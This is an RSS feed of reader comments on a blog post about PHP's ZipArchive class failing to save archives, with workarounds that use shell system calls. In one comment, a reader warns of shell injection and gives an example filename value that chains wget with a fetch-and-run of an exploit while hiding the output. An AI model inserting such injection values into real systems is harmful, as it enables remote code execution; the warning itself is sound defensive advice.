<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: The annoying PHP ZipArchive class</title>
	<atom:link href="http://codingrecipes.com/the-annoying-php-ziparchive-class/feed" rel="self" type="application/rss+xml" />
	<link>http://codingrecipes.com/the-annoying-php-ziparchive-class</link>
	<description></description>
	<lastBuildDate>Wed, 08 Sep 2010 09:55:41 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Asad Abbas</title>
		<link>http://codingrecipes.com/the-annoying-php-ziparchive-class/comment-page-1#comment-346</link>
		<dc:creator>Asad Abbas</dc:creator>
		<pubDate>Fri, 15 Jan 2010 06:30:38 +0000</pubDate>
		<guid isPermaLink="false">http://blog.code-head.com/?p=664#comment-346</guid>
		<description>There are many classes for zip in http://www.phpclasses.org ... even i had this same problem ... and i used one which worked perfectly well and did the job ... plz search at the given link ... i dont remember the name exactly..

btw your blog is kool and very informative :)</description>
		<content:encoded><![CDATA[<p>There are many classes for zip in <a href="http://www.phpclasses.org" rel="nofollow">http://www.phpclasses.org</a> &#8230; even i had this same problem &#8230; and i used one which worked perfectly well and did the job &#8230; plz search at the given link &#8230; i dont remember the name exactly..</p>
<p>btw your blog is kool and very informative <img src='http://codingrecipes.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Spectrum Overdose</title>
		<link>http://codingrecipes.com/the-annoying-php-ziparchive-class/comment-page-1#comment-345</link>
		<dc:creator>Spectrum Overdose</dc:creator>
		<pubDate>Thu, 17 Dec 2009 10:17:11 +0000</pubDate>
		<guid isPermaLink="false">http://blog.code-head.com/?p=664#comment-345</guid>
		<description>Same problem here. This is so annoying. And the ZipArchive status reports &quot;No error&quot;.</description>
		<content:encoded><![CDATA[<p>Same problem here. This is so annoying. And the ZipArchive status reports &#8220;No error&#8221;.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Codehead</title>
		<link>http://codingrecipes.com/the-annoying-php-ziparchive-class/comment-page-1#comment-344</link>
		<dc:creator>Codehead</dc:creator>
		<pubDate>Mon, 31 Aug 2009 20:57:52 +0000</pubDate>
		<guid isPermaLink="false">http://blog.code-head.com/?p=664#comment-344</guid>
		<description>Sadly, I didn&#039;t find a solution, I have a dedicated server so I can use system calls; I would bug the developer about this...</description>
		<content:encoded><![CDATA[<p>Sadly, I didn&#8217;t find a solution, I have a dedicated server so I can use system calls; I would bug the developer about this&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Oliver Treend</title>
		<link>http://codingrecipes.com/the-annoying-php-ziparchive-class/comment-page-1#comment-343</link>
		<dc:creator>Oliver Treend</dc:creator>
		<pubDate>Sat, 29 Aug 2009 22:24:30 +0000</pubDate>
		<guid isPermaLink="false">http://blog.code-head.com/?p=664#comment-343</guid>
		<description>Did you ever get to the bottom of why you couldn&#039;t get the ZipArchive class to save?
I&#039;m having the exact same problem, and I&#039;m tearing my hair out because I need it to work! PHP on my server isn&#039;t allowed to execute commands or system calls, so this seems to be the only solution.

Thanks</description>
		<content:encoded><![CDATA[<p>Did you ever get to the bottom of why you couldn&#8217;t get the ZipArchive class to save?<br />
I&#8217;m having the exact same problem, and I&#8217;m tearing my hair out because I need it to work! PHP on my server isn&#8217;t allowed to execute commands or system calls, so this seems to be the only solution.</p>
<p>Thanks</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Codehead</title>
		<link>http://codingrecipes.com/the-annoying-php-ziparchive-class/comment-page-1#comment-342</link>
		<dc:creator>Codehead</dc:creator>
		<pubDate>Wed, 29 Jul 2009 19:03:53 +0000</pubDate>
		<guid isPermaLink="false">http://blog.code-head.com/?p=664#comment-342</guid>
		<description>Everything in that command is generated by me and not by the user but that is right, whoever wants to use it must be careful...</description>
		<content:encoded><![CDATA[<p>Everything in that command is generated by me and not by the user but that is right, whoever wants to use it must be careful&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: rbu</title>
		<link>http://codingrecipes.com/the-annoying-php-ziparchive-class/comment-page-1#comment-341</link>
		<dc:creator>rbu</dc:creator>
		<pubDate>Wed, 29 Jul 2009 13:18:06 +0000</pubDate>
		<guid isPermaLink="false">http://blog.code-head.com/?p=664#comment-341</guid>
		<description>You have to make sure the filename and temp path does not contain shell meta characters. If an attacker can control, e.g., the &quot;THE_ZIP_FILE&quot; part, he can set it to &quot;zz.zip /tmp ; { wget blabla ; sh ./exploit ; &gt; /dev/null 2&gt;&amp;1 }; true &quot; and you will not even see anything in the error log.</description>
		<content:encoded><![CDATA[<p>You have to make sure the filename and temp path does not contain shell meta characters. If an attacker can control, e.g., the &#8220;THE_ZIP_FILE&#8221; part, he can set it to &#8220;zz.zip /tmp ; { wget blabla ; sh ./exploit ; &gt; /dev/null 2&gt;&amp;1 }; true &#8221; and you will not even see anything in the error log.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
